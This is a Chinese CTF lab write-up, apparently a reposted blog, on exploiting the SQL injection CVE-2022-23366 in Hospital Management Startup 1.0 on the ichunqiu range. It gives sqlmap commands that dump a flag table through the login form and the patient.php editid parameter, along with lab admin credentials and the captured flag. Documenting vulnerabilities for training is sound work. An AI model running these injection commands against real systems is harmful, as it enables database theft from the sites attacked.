春秋云境：CVE-2022-23366(Hospital Management Startup 1.0 sqli)

其他 2023-07-25 17:26:23 阅读次数: 0

目录

1.登录处存在SQL注入

2.后台SQL注入

一、题目

靶标介绍：

Hospital Management Startup 1.0 sqli

进入题目：

1.登录处存在SQL注入

doctor：点击

扫描二维码关注公众号，回复： 15847525 查看本文章

登录抓包：

burp抓包：

sqlmap：

python sqlmap.py -r x.txt -batch -dbs

因为是时间盲注，比较慢，所以根据i春秋的靶场

ctf 库 flag 表 flag 字段

直接查询flag字段值：

python sqlmap.py -r x.txt -batch -D "ctf" -T "flag" -dump

flag{9ad8650a-1cce-4bd1-9b21-d5f7caf7ce42}

2.后台SQL注入

Admin：位置

admin：123456789

进入页面：

点击编辑：

跳转到这：

此处存在SQL注入：

python sqlmap.py -u "http://xxx.cloudeci1.ichunqiu.com/patient.php?editid=1" -D "ctf" -T "flag" -dump --batch

burp的插件CO2也可以：

输入命令 run即可：

--batch -D "ctf" -T "flag" -dump

flag{9ad8650a-1cce-4bd1-9b21-d5f7caf7ce42}

猜你喜欢

转载自blog.csdn.net/m0_65712192/article/details/131894609

春秋云境：CVE-2022-23366(Hospital Management Startup 1.0 sqli)

春秋-SQLi题

Hello World, S/4HANA for Customer Management 1.0

SQLi

【sqli】

unity疯狂牧场完整项目源码 - Frenzy Farming time management game kit V1.0

春秋云境：CVE-2022-30887（文件上传漏洞）

春秋云境：CVE-2022-28060（SQL注入）

春秋云境：CVE-2022-28525 (文件上传漏洞)

春秋云境:CVE-2022-32991（SQL注入）

春秋云境：CVE-2022-25578（文件包含）

春秋云境：CVE-2022-26965（后台RCE）

Web-SQLi[i春秋][200pt]

startup,startup mount,startup nomount之间的区别

Sqli-Labs之1环境搭建

CVE-2019-0948：Microsoft Management Console (MMC)漏洞

The Startup file

NetCore startup

IPL与Startup

【Django】startup

sqli(7)

Incident Management

Fragment Management

management note

Traffic Management

Management Framework

Project Management

Log Management

无Management

Financial Management

今日推荐

周排行

Leetcode简单题61~80

解决zookeeper磁盘IO高的问题

多线程相关方法详解

Maven-setting.xml文件详解

Maven 项目的 classpath 理解

渊亭科技大数据笔试题

配置JVM内存分配

计算机网络个人学习笔记（三）网络层：第三部分连载

js中两个等号(==)和三个等号(===)的区别

用C程序自动打开电脑上的程序

每日归档

更多

2024-09-18(0)

2024-09-17(0)

2024-09-16(0)

2024-09-15(0)

2024-09-14(0)

2024-09-13(0)

2024-09-12(0)

2024-09-11(0)

2024-09-10(0)

2024-09-09(0)